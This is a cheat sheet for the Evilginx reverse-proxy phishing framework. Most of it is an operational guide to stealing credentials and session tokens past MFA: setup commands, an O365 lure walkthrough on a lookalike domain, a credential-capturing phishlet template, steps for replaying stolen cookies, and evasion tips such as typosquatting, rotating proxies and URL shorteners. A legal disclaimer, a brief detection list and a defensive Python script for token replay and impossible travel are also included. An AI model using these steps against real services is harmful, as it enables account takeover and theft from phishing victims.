Quick Reference

Advanced phishing framework for bypassing 2FA/MFA through reverse proxy session hijacking.

Legal Warning

Evilginx is a powerful tool for authorized red team engagements ONLY. Unauthorized use is illegal. Always have explicit written permission before testing. This content is for educational purposes.

📦 Installation

Clone & Build (Go required)

git clone https://github.com/kgretzky/evilginx2.git
cd evilginx2
make

Run with phishlets directory

sudo ./bin/evilginx -p ./phishlets

Docker Installation

docker pull kgretzky/evilginx2
docker run -it -p 443:443 -p 80:80 kgretzky/evilginx2

⚙️ Initial Setup

Set domain & IP

config domain yourdomain.com
config ip YOUR_SERVER_IP

Enable redirect URL (for failed attempts)

config redirect_url https://www.google.com

DNS Requirements

# A Record: yourdomain.com -> SERVER_IP
# A Record: *.yourdomain.com -> SERVER_IP
# Disable Cloudflare proxy (grey cloud)

🎣 Phishlet Commands

phishlets                               # List phishlets
phishlets get-hosts NAME                # Show phishlet details
phishlets hostname NAME sub.domain.com  # Set hostname
phishlets enable NAME                   # Enable phishlet
phishlets disable NAME                  # Disable phishlet
phishlets hide NAME                     # Hide phishlet
phishlets unhide NAME                   # Unhide phishlet

🔗 Lure Commands

lures create NAME                 # Create lure
lures                             # List lures
lures get-url ID                  # Get lure URL
lures edit ID redirect_url URL    # Set redirect
lures edit ID path /custom        # Set custom path
lures delete ID                   # Delete lure

🍪 Session Commands

sessions                  # List sessions
sessions ID               # View session
sessions delete ID        # Delete session
sessions delete all       # Delete all

📋 Popular Phishlets

o365          # Microsoft 365
outlook       # Outlook
google        # Google
linkedin      # LinkedIn
github        # GitHub
okta          # Okta

🚀 Full O365 Setup Example

# Initial configuration
config domain evil-corp.com
config ip 192.168.1.100

# Setup O365 phishlet
phishlets hostname o365 login.evil-corp.com
phishlets enable o365

# Create lure
lures create o365
lures get-url 0

# Output: https://login.evil-corp.com/XXXX

# Monitor for captured sessions
sessions

🍪 Importing Captured Cookies

1. Get session cookies from Evilginx

sessions 0
# Copy the JSON cookie output

2. Import to browser using Cookie Editor extension

# Install "Cookie-Editor" browser extension
# Navigate to target site
# Click extension -> Import -> Paste JSON
# Refresh page - you're now authenticated!

3. Alternative: Use curl with cookies

curl -b "cookie1=value1; cookie2=value2" https://target.com/api/user

🔓 MFA Bypass Methods

Real-time Phishing (Evilginx)

Proxy intercepts session after MFA completion

SIM Swapping

Port victim's number to attacker's SIM

SS7 Attacks

Intercept SMS at telecom level

Push Notification Fatigue

Spam push requests until user approves

OAuth Consent Phishing

Trick user into granting app permissions

🛡️ Evasion Tips

Domain Selection

Use typosquatting or lookalike domains

micros0ft-login.com, login-0365.com

SSL Certificates

Let's Encrypt auto-generated by Evilginx

IP Blacklisting

Use residential proxies, rotate IPs

URL Shorteners

Obfuscate lure URLs with bit.ly, rebrand.ly

📝 Custom Phishlet Template

name: 'custom_app'
author: '@yourhandle'
min_ver: '2.3.0'

proxy_hosts:
  - phish_sub: 'login'
    orig_sub: 'login'
    domain: 'target.com'
    session: true
    is_landing: true

sub_filters:
  - triggers_on: 'login.target.com'
    orig_sub: 'login'
    domain: 'target.com'
    search: 'login.target.com'
    replace: 'login.{phish_domain}'
    mimes: ['text/html', 'application/json']

auth_tokens:
  - domain: '.target.com'
    keys: ['session_token', 'auth_cookie']

credentials:
  username:
    key: 'email'
    search: '(.*)'
    type: 'post'
  password:
    key: 'password'
    search: '(.*)'
    type: 'post'

login:
  domain: 'login.target.com'
  path: '/authenticate'

🔧 Alternative Tools

Modlishka

Lightweight reverse proxy phishing

Muraena

Automated reverse proxy framework

GoPhish

Phishing campaign management (no MFA bypass)

King Phisher

Campaign toolkit with templates

🔍 Detection (Blue Team)

Certificate Transparency

Monitor CT logs for lookalike domains

Impossible Travel

Login from unexpected geolocations

Token Replay Detection

Same token from different IPs

FIDO2/WebAuthn

Phishing-resistant MFA (hardware keys)
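Two of the checks above (token replay from a second source IP, impossible travel between consecutive sign-ins) as an added detection example; this is not part of Evilginx or of the original cheat sheet. The sign-in log lines, their field layout, the haversine distance helper and the 900 km/h speed threshold are constructed assumptions.

```python
"""Detection example (added here, not part of the Evilginx project): flag
session tokens replayed from a second source IP and logins whose geolocation
change implies impossible travel. Log lines and field layout are constructed."""
import math
from datetime import datetime

# Constructed sign-in log: timestamp, user, session id, source IP, lat, lon.
SAMPLE_LOG = """\
2024-05-01T09:00:00Z alice sess_a1 203.0.113.10 52.52 13.40
2024-05-01T09:03:00Z alice sess_a1 198.51.100.7 37.77 -122.42
2024-05-01T09:10:00Z bob sess_b7 192.0.2.44 51.51 -0.13
2024-05-01T10:10:00Z bob sess_b7 192.0.2.44 51.51 -0.13
"""

def parse_log(text):
    events = []
    for line in text.splitlines():
        ts, user, sid, ip, lat, lon = line.split()
        events.append({"ts": datetime.fromisoformat(ts.replace("Z", "+00:00")),
                       "user": user, "sid": sid, "ip": ip,
                       "lat": float(lat), "lon": float(lon)})
    return events

def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance between two points, in kilometres."""
    p1, p2 = math.radians(lat1), math.radians(lat2)
    a = (math.sin((p2 - p1) / 2) ** 2
         + math.cos(p1) * math.cos(p2) * math.sin(math.radians(lon2 - lon1) / 2) ** 2)
    return 2 * 6371.0 * math.asin(math.sqrt(a))

def token_replay(events):
    """Session ids seen from more than one source IP: a proxied session being reused."""
    ips = {}
    for e in events:
        ips.setdefault(e["sid"], set()).add(e["ip"])
    return {sid for sid, seen in ips.items() if len(seen) > 1}

def impossible_travel(events, max_kmh=900.0):
    """Users whose consecutive sign-ins imply a speed above max_kmh (assumed threshold)."""
    flagged, last = set(), {}
    for e in sorted(events, key=lambda e: e["ts"]):
        prev = last.get(e["user"])
        if prev is not None:
            hours = (e["ts"] - prev["ts"]).total_seconds() / 3600
            km = haversine_km(prev["lat"], prev["lon"], e["lat"], e["lon"])
            if hours > 0 and km / hours > max_kmh:
                flagged.add(e["user"])
        last[e["user"]] = e
    return flagged
```

In the sample, alice's session id appears from two IPs three minutes apart on different continents, so both checks fire on her and neither on bob.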

⚡ Quick Command Reference

Configuration

config                    # Show config
config domain DOMAIN      # Set domain
config ip IP              # Set server IP
config redirect_url URL   # Set redirect

Phishlets

phishlets                 # List all
phishlets hostname N H    # Set hostname
phishlets enable N        # Enable
phishlets disable N       # Disable

Lures

lures                     # List all
lures create PHISHLET     # Create new
lures get-url ID          # Get URL
lures delete ID           # Delete

Sessions

sessions                  # List all
sessions ID               # View details
sessions delete ID        # Delete one
sessions delete all       # Delete all